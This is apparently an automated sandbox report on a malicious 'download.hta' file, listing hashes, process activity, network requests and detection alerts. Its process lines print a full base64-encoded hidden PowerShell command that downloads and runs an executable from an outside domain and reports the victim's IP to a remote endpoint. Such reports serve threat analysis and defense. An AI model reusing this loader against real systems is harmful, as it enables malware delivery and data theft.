analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

download.hta

Full analysis: https://app.any.run/tasks/d55b0d13-9854-49ce-bf9d-90bed2b4c34f
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: October 09, 2019, 18:43:48
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
Indicators:
MIME: text/html
File info: HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5:

41A9ECCC110C0048E3232A35237B521E

SHA1:

63F87A6C6AE811120148404FCF38D03EFE8594E9

SHA256:

AAD8A8928F91E1828A3206A404F8424EEEE5777AED61053B920A8E120C12466C

SSDEEP:

48:ZUtN/vB6iq//kEMt+VFiiudCJ+Bun3c1dOQGTSa3mK0eo9P9:OjBvg/kfoVFipnQ3cSQ6Sa26+l

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 2192)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 2968)
    • Creates files in the user directory

      • powershell.exe (PID: 2908)
    • Executes application which crashes

      • powershell.exe (PID: 2908)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 2968)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.html | HyperText Markup Language (100)
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
4
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start mshta.exe no specs cmd.exe no specs powershell.exe ntvdm.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2968"C:\Windows\System32\mshta.exe" "C:\Users\admin\Downloads\download.hta"C:\Windows\System32\mshta.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2192cmd /c powershell.exe -nop -wind hidden -Exec Bypass -noni -enc TgBlAHcALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABlAG4AdgA6AHQAZQBtAHAAXAAgAC0ATgBhAG0AZQAgACIAbgBlAHcAcwBvAGYAdAAiACAALQBJAHQAZQBtAFQAeQBwAGUAIABEAGkAcgBlAGMAdABvAHIAeQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AbQBuAG0AbgBtAG4AbQBuAG0AbgBtAG4ALgBjAGwAdQBiAC8AMQAxADEALwBmAGkAbABlADEAMgAzADQANQA2ADcAOAAuAGUAeABlACIALAAgACIAJABlAG4AdgA6AHQAZQBtAHAAXABuAGUAdwBzAG8AZgB0AFwAbABhAHUAbgBjAGgAZQByAC4AZQB4AGUAIgApADsAcwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgB0AGUAbQBwAFwAbgBlAHcAcwBvAGYAdABcAGwAYQB1AG4AYwBoAGUAcgAuAGUAeABlADsAJABpAHAAIAA9ACAASQBuAHYAbwBrAGUALQBSAGUAcwB0AE0AZQB0AGgAbwBkACAAaAB0AHQAcAA6AC8ALwBpAHAAaQBuAGYAbwAuAGkAbwAvAGoAcwBvAG4AIAB8ACAAUwBlAGwAZQBjAHQAIAAtAGUAeABwACAAaQBwADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcABzADoALwAvADYANgBmAGQAYQAyADUAMAAuAG4AZwByAG8AawAuAGkAbwAvAGEAcABpAC8ATABvAGcALwBOAGUAdwA/AGsAZQB5AD0AbQB5AGsAZQB5ACYAaQBwAD0AJABpAHAAIgA=C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2908powershell.exe -nop -wind hidden -Exec Bypass -noni -enc TgBlAHcALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABlAG4AdgA6AHQAZQBtAHAAXAAgAC0ATgBhAG0AZQAgACIAbgBlAHcAcwBvAGYAdAAiACAALQBJAHQAZQBtAFQAeQBwAGUAIABEAGkAcgBlAGMAdABvAHIAeQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AbQBuAG0AbgBtAG4AbQBuAG0AbgBtAG4ALgBjAGwAdQBiAC8AMQAxADEALwBmAGkAbABlADEAMgAzADQANQA2ADcAOAAuAGUAeABlACIALAAgACIAJABlAG4AdgA6AHQAZQBtAHAAXABuAGUAdwBzAG8AZgB0AFwAbABhAHUAbgBjAGgAZQByAC4AZQB4AGUAIgApADsAcwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgB0AGUAbQBwAFwAbgBlAHcAcwBvAGYAdABcAGwAYQB1AG4AYwBoAGUAcgAuAGUAeABlADsAJABpAHAAIAA9ACAASQBuAHYAbwBrAGUALQBSAGUAcwB0AE0AZQB0AGgAbwBkACAAaAB0AHQAcAA6AC8ALwBpAHAAaQBuAGYAbwAuAGkAbwAvAGoAcwBvAG4AIAB8ACAAUwBlAGwAZQBjAHQAIAAtAGUAeABwACAAaQBwADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcABzADoALwAvADYANgBmAGQAYQAyADUAMAAuAG4AZwByAG8AawAuAGkAbwAvAGEAcABpAC8ATABvAGcALwBOAGUAdwA/AGsAZQB5AD0AbQB5AGsAZQB5ACYAaQBwAD0AJABpAHAAIgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2440"C:\Windows\system32\ntvdm.exe" -i1 C:\Windows\system32\ntvdm.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
NTVDM.EXE
Exit code:
255
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
575
Read events
500
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
2908powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\R6GPYALIC96OF8BFBGKL.temp
MD5:
SHA256:
2440ntvdm.exeC:\Users\admin\AppData\Local\Temp\scs54F3.tmp
MD5:
SHA256:
2440ntvdm.exeC:\Users\admin\AppData\Local\Temp\scs54F4.tmp
MD5:
SHA256:
2908powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:C911F7DBBF8956A476A7162FD7A88B15
SHA256:2D59CFC009032C59A8A26237F4091BD155E115DA834FF623AF40BC693711AF85
2908powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF114e1d.TMPbinary
MD5:C911F7DBBF8956A476A7162FD7A88B15
SHA256:2D59CFC009032C59A8A26237F4091BD155E115DA834FF623AF40BC693711AF85
2908powershell.exeC:\Users\admin\AppData\Local\Temp\newsoft\launcher.exehtml
MD5:7CB2FF717ED7119FC09698333924F126
SHA256:93584761B38C03939419FDCCF499C22C21B05FCEB3590D2CD5954B2B6F23EBC3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2908
powershell.exe
GET
302
68.65.122.146:80
http://mnmnmnmnmnmn.club/111/file12345678.exe
US
html
234 b
suspicious
2908
powershell.exe
GET
200
68.65.122.146:80
http://mnmnmnmnmnmn.club/cgi-sys/suspendedpage.cgi
US
html
7.41 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2908
powershell.exe
68.65.122.146:80
mnmnmnmnmnmn.club
Namecheap, Inc.
US
suspicious

DNS requests

Domain
IP
Reputation
mnmnmnmnmnmn.club
  • 68.65.122.146
suspicious

Threats

PID
Process
Class
Message
A Network Trojan was detected
ET TROJAN Domen SocEng CnC Observed in DNS Query
2908
powershell.exe
A Network Trojan was detected
ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
Process
Message
powershell.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
powershell.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
powershell.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
powershell.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
powershell.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
powershell.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
powershell.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
powershell.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
powershell.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
powershell.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144